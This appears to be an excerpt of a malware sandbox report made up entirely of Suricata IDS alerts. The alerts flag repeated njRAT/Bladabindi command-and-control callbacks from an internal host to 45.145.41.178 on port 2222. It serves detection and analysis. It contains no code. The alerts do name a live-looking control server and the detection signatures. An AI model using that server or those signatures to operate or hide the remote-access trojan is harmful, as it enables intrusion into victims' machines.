Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:53993 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54008 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54008 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54009 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54009 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:53991 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54011 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54011 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54012 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54011 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54012 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54012 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:53994 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54013 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54013 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54014 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54014 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:53996 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54015 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54016 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54015 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53998 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54016 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:53998 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54009 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54018 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:53999 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54018 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54018 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54019 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54006 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54019 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54001 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54001 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54001 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54020 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54020 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54020 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54022 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54022 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54022 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54011 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54003 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54007 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54023 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54023 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54007 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54007 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54024 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54024 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54015 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54025 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54025 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54019 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54014 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54012 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54026 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54026 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54027 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54001 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54027 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54026 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54028 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54027 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54022 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54028 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54030 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54021 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54031 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54030 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54030 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54021 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54021 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54033 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54031 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54028 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54033 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54016 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54017 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54017 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54034 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54034 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54005 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54005 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54035 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54005 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54037 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54024 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54035 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54037 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54018 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54041 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54041 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54039 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54041 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54042 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54036 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54042 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54036 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54039 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54043 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54017 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54043 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54045 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54045 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54045 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54027 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54034 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54037 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54048 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54032 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54033 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54047 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54047 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54047 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54032 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54048 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54050 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54050 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54031 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54038 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54038 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54051 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54051 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54038 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54023 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54052 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54052 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54041 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54043 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54053 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:53998 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54055 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54053 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54047 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54010 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54055 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54010 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54036 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54048 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54057 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54057 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54058 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54042 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54058 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54060 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54060 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54060 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54040 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54058 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54038 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54040 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54039 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54040 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54062 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54029 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54062 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54062 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54029 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54032 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54064 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54029 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54065 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54065 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54053 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54065 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54064 -> 45.145.41.178:2222
